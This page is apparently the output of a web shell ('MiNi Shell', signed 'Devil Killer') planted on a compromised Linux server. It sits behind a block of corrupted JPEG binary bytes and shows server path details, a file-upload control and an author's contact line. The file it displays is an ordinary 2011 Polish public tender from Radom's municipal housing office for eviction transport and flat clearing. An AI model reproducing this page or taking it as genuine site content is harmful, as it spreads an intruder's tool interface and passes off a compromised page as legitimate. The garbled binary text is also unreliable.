JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/306379-N-2011.html

<p class="kh_header"><b>Radom: ŚWIADCZENIE USŁUG  ZWIĄZANYCH Z: TRANSPORTEM RUCHOMOŚCI PRZY WYKWATEROWANIACH I EKSMISJACH Z LOKALI ORAZ OPRÓŻNIANIEM I SPRZĄTANIEM ZWALNIANYCH LOKALI</b><br>
<b>Numer ogłoszenia: 306379 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Lokalami w Radomiu , ul. Garbarska 55/57, 26-600 Radom, woj. mazowieckie, tel. 0 48 383 57 50, faks 0 48 383 57 48 w. 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzlradom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA BUDŻETOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG  ZWIĄZANYCH Z: TRANSPORTEM RUCHOMOŚCI PRZY WYKWATEROWANIACH I EKSMISJACH Z LOKALI ORAZ OPRÓŻNIANIEM I SPRZĄTANIEM ZWALNIANYCH LOKALI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usług związanych z: transportem ruchomości przy wykwaterowaniach i eksmisjach z lokali mieszkalnych i użytkowych, z przynależnych do nich piwnic i komórek do lokali wskazanych przez Zamawiającego, oraz  opróżnianiem i sprzątaniem zwalnianych lokali  znajdujących się  w budynkach będących w zarządzie Zamawiającego. 
Na przedmiot  zamówienia składają się dwa zadania :
Zadanie 1
- opróżnianie i sprzątanie lokali: mieszkalnych i użytkowych (wraz z przynależnymi piwnicami i komórkami)  na skutek zgonów najemców i z innych przyczyn oraz wykonywanie przeprowadzek przy eksmisjach do lokalu wskazanego przez Zamawiającego z lokali: mieszkalnych i użytkowych oraz  z przynależnych do nich  piwnic i komórek -  polegające na:  
wyniesieniu   ruchomości i śmieci zgromadzonych w lokalu, w piwnicy i w komórkach,
 załadunku wyniesionych ruchomości i śmieci na podstawiony środek transportu,
wniesieniu przetransportowanych ruchomości do wskazanego lokalu lub  depozytu 
 
Zadanie 2
transport zabezpieczonych przed uszkodzeniem ruchomości do wskazanego lokalu lub depozytu na terenie miasta Radomia
wywóz ruchomości i śmieci po opróżnianiu i sprzątaniu lokalu na wysypisko odpadów komunalnych, a w przypadku sprzętu elektrycznego i  elektronicznego - utylizacja tych odpadów zgodnie z obowiązującymi przepisami
wywóz pozostawionych śmieci i zbędnych ruchomości z lokalu po przeprowadzonej eksmisji na wysypisko odpadów komunalnych, 
   Wymienione w zadaniach czynności  Wykonawca będzie wykonywał przy pomocy   takiej liczby osób, która pozwoli na  prawidłowe i terminowe wykonanie zamówienia oraz transportu składającego się z min. 1 samochodu ciężarowego z plandeką lub zabudowaną skrzynią   ładunkową o minimalnej ładowności 1,2 t. Wykonawca zobowiązany jest zapewnić worki i kartony do wykonania usług pakowania odpadów i ruchomości.
Zamawiający zastrzega, że  wyżej wymienione odpady nie mogą być umieszczane w pojemnikach na odpady komunalne ustawione w nieruchomościach, a także pozostawiane na terenie  administrowanym przez Zamawiającego. 
Wykonawca ma obowiązek udokumentować Zamawiającemu odbiór przyjęcia  usuniętych odpadów - ruchomości na wysypisko lub do ich utylizacji (np. dostarczyć karty odpadów). Wykonawca musi przedłożyć ofertę na oba zadania
 Zamawiający określa  minimalną ilość roboczogodzin objętych niniejszym zamówieniem  jakie zobowiązuje się zrealizować na:
     a)  dla Zadania 1  - 4200 roboczogodziny  
    b) dla  Zadania 2 -  750 roboczogodzin 
 Zamawiający określa  maksymalną ilość roboczogodzin jaka może zostać zrealizowana w ramach niniejszego zamówienia  na :
   a)  dla Zadania 1  - 5300 roboczogodziny  
    b) dla  Zadania 2 -  900 roboczogodzin 
 Zamawiający zastrzega sobie możliwość sprawowania kontroli, w dowolnie wybranym przez siebie momencie, nad wykonywaniem usługi. 
 Wykonawca zobowiązuje się w ramach zawartej umowy do wykonania wszystkich czynności powyżej określonych w terminie do 4 dni kalendarzowych od dnia otrzymania pisemnego  zlecenia od Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art.67 ust.1 pkt.6 ustawy,  Zamówienie uzupełniające:
może być udzielone w okresie 3 lat od udzielenia zamówienia podstawowego,
może być udzielone wyłącznie dotychczasowemu wykonawcy usług, wybranemu w niniejszym postępowaniu, po przeprowadzeniu negocjacji w trybie zamówienia z wolnej ręki,
może stanowić nie więcej niż 50% wartości zamówienia podstawowego
musi polegać na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 90.51.10.00-2, 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że  na czas realizacji zamówienia będą dysponowali co najmniej jednym samochodem ciężarowym  z plandeką lub zabudowaną skrzynią   ładunkową  o ład. min. 1,2 t.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)W przypadku złożenia oferty wspólnej - upoważnienie dla Pełnomocnika do reprezentowania podmiotów 	działających wspólnie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do reprezentowania tych 	podmiotów (zgodnie z dokumentem określającym status prawny Wykonawcy lub dołączonym do oferty 	pełnomocnictwem).
  b) W przypadku gdy Wykonawcę reprezentuje pełnomocnik - Aktualne pełnomocnictwo dla osoby lub osób 	upoważnionych do reprezentowania Wykonawcy, do zaciągania w jego imieniu zobowiązań oraz podpisania oferty 	jeżeli nie wynika ono bezpośrednio z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo 	takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy to do oferty należy bezwzględnie 	dołączyć oryginał lub poświadczoną (za zgodność z oryginałem) przez notariusza kopię pełnomocnictwa 	wystawionego na reprezentanta Wykonawcy przez osoby do tego upoważnione.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Zamawiający przewiduje możliwość zmian umowy w drodze pisemnego aneksu pod rygorem nieważności zgodnie z art. 144 ust. 1 ustawy w następujących przypadkach:
- Rozszerzenia lub zmiany zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą będzie korzystne dla Zamawiającego z tytułu należytego wykonania umowy, z tym, że Zamawiający nie dopuszcza możliwości zmiany podwykonawcy, na potencjał którego Wykonawca powołał się przy wykazaniu spełnienia warunków, o których mowa w art. 22 Ust. 1 ustawy.
b)Jeżeli nastąpi zmiana przepisów ustawy o podatku od towarów i usług i podatku akcyzowym, zmiany ceny brutto umowy - w przypadku zmiany stawki podatku VAT (przy zachowaniu dotychczasowej wartości netto) nie będą wymagały formy pisemnej - aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mzlradom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Sucha 15 26-600 Radom I piętro sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2011 godzina 12:00, miejsce: Miejski Zarząd Lokalami  w Radomiu ul. Sucha 15 26-600 Radom I piętro sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com